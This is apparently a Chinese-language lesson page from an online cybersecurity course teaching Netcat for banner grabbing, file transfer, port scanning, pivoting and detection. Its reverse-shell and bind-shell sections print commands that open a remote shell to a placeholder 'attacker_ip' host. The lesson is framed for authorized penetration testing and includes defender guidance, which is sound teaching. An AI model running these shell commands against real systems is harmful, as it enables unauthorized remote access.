0Pricing
Cyber Security Academy · 课时

Netcat:网络瑞士军刀

使用 nc 获取服务标语、传输文件、转发端口以及建立简单的反向 Shell。

Netcat:网络瑞士军刀 是 CoddyKit 上的免费 Cyber Security Academy 课时。 这是第 3 节课,共 4 节。 你可以在下方免费阅读本课时的完整内容 — 然后在浏览器中使用内置代码编辑器和全天候 AI 导师进行实践。 这是 Cyber Security Academy 学习路径的一部分,你的进度在网页和 CoddyKit 应用中同步。 Cyber Security Academy 课程共包含 4 节课。

什么是 Netcat

Netcat(nc)是一种通过 TCP 或 UDP 网络连接读取和写入数据的工具。它几乎安装在每个 Unix 系统上,对于调试、文件传输和基本漏洞利用都非常有价值。

基本连接与横幅抓取

连接到任意 TCP 端口,抓取服务横幅并手动与协议交互。这是最简单的侦察形式。

# Connect to port 80
nc 192.168.1.100 80
GET / HTTP/1.0
[Enter twice]

# Connect to SMTP
nc mail.example.com 25
# Returns: 220 mail.example.com ESMTP

监听端口

Netcat 可以使用 -l -p 监听传入连接。这对于测试连通性、接收反向 shell 和接收文件很有用。

# Listen on port 4444
nc -lvnp 4444

# -l listen
# -v verbose
# -n no DNS resolution
# -p port number

使用 Netcat 传输文件

Netcat 可以通过管道将文件发送到连接中。接收方进行监听,并将输出重定向到文件。没有加密——只能在受信任的网络上使用。

# Receiver (runs first):
nc -lvnp 4444 > received_file.txt

# Sender:
nc 192.168.1.10 4444 < file_to_send.txt

使用 Netcat 扫描端口

Netcat 可以使用 -z(零 I/O 模式)和 -w(超时)执行基本端口扫描。它比 Nmap 慢,但在 Nmap 不可用时很有用。

# Scan ports 20-80
nc -zv 192.168.1.100 20-80 2>&1 | grep succeeded

# With timeout:
nc -zvw2 192.168.1.100 22 80 443

简单反向 Shell

反向 shell 会让目标连接回攻击者。在渗透测试中,当防火墙规则阻止向目标发起入站连接时,这种方式很有用。

# Attacker listens:
nc -lvnp 4444

# Target executes (bash):
bash -i >& /dev/tcp/attacker_ip/4444 0>&1

# Or via nc:
nc attacker_ip 4444 -e /bin/bash

绑定 Shell

绑定 shell 在目标计算机上监听,攻击者连接到该 shell。由于防火墙通常会阻止入站连接,它在现代渗透测试中并不常见。

# On target: listen and serve a shell
nc -lvnp 5555 -e /bin/bash

# On attacker: connect
nc target_ip 5555

UDP 模式

使用 -u 建立 UDP 连接。这对于测试 DNS(端口 53)和 SNMP(端口 161)等 UDP 服务很有用。

# Test DNS over UDP
nc -u 8.8.8.8 53

# Test SNMP
nc -u 192.168.1.1 161

使用 Netcat 进行代理

Netcat 可以串联连接,以便通过网络跳转。结合命名管道(mkfifo),它无需额外工具即可创建简单的双向隧道。

mkfifo /tmp/pipe
nc -lvnp 4445 < /tmp/pipe | nc internal_host 80 > /tmp/pipe

Ncat:现代替代方案

Ncat(Nmap 的一部分)通过 SSL 支持(--ssl)、访问控制和中继模式扩展了 Netcat 的功能。对于加密通道,优先使用 Ncat。

# SSL listener
ncat --ssl -lvnp 4444

# SSL connect
ncat --ssl target_ip 4444

防御者:检测 Netcat

Netcat 连接看起来像普通 TCP 连接。防御者可以通过进程名称监控(HIDS)、异常出站端口,以及从异常父进程派生的 shell 来检测它。

快速检查

哪个 Netcat 标志会启用监听模式?

总结:Netcat

Netcat 是一种基础工具:可以用它抓取横幅、传输文件、测试连通性,以及理解反向 shell 和绑定 shell 的工作机制。在获得授权的渗透测试中,它可以验证防火墙规则并模拟攻击者进行网络跳转。请熟练掌握它——既要会使用,也要会检测。

常见问题解答

「Netcat:网络瑞士军刀」课时是免费的吗?

是的 — 「Netcat:网络瑞士军刀」的完整文本可在网页上免费阅读。要进行交互式练习(内置代码编辑器和全天候 AI 导师)并解锁 Cyber Security Academy 课程的其余内容,请升级到 CoddyKit PRO。 Cyber Security Academy 课程共包含 4 节课。

「Netcat:网络瑞士军刀」这节课中我会学到什么?

使用 nc 获取服务标语、传输文件、转发端口以及建立简单的反向 Shell。 你通过在浏览器中直接运行的动手代码来练习 Cyber Security Academy,全天候 AI 导师会在你学习这节课的过程中回答你的问题。

学习 Cyber Security Academy 需要有经验吗?

无需任何先前经验。CoddyKit 上的 Cyber Security Academy 课程适合初学者到高级学习者,你可以从这里开始或从头开始,按照自己的节奏学习。 这是第 3 节课,共 4 节。

「Netcat:网络瑞士军刀」课时需要多长时间?

大多数 CoddyKit 课程大约需要 5–10 分钟。每节课都很精短且互动,所以你能稳步进步,并在网页和应用中从离开的地方继续。

我能在这节 Cyber Security Academy 课中编写并运行代码吗?

能。每节 Cyber Security Academy 课都包含内置代码编辑器,你可以在浏览器中直接编写并运行真实代码,并获得即时 AI 反馈 — 无需本地设置。

此课程中的所有课时

  1. Nmap 端口扫描技术
  2. 服务与操作系统指纹识别
  3. Netcat:网络瑞士军刀
  4. 网络枚举脚本编写
← 返回 Cyber Security Academy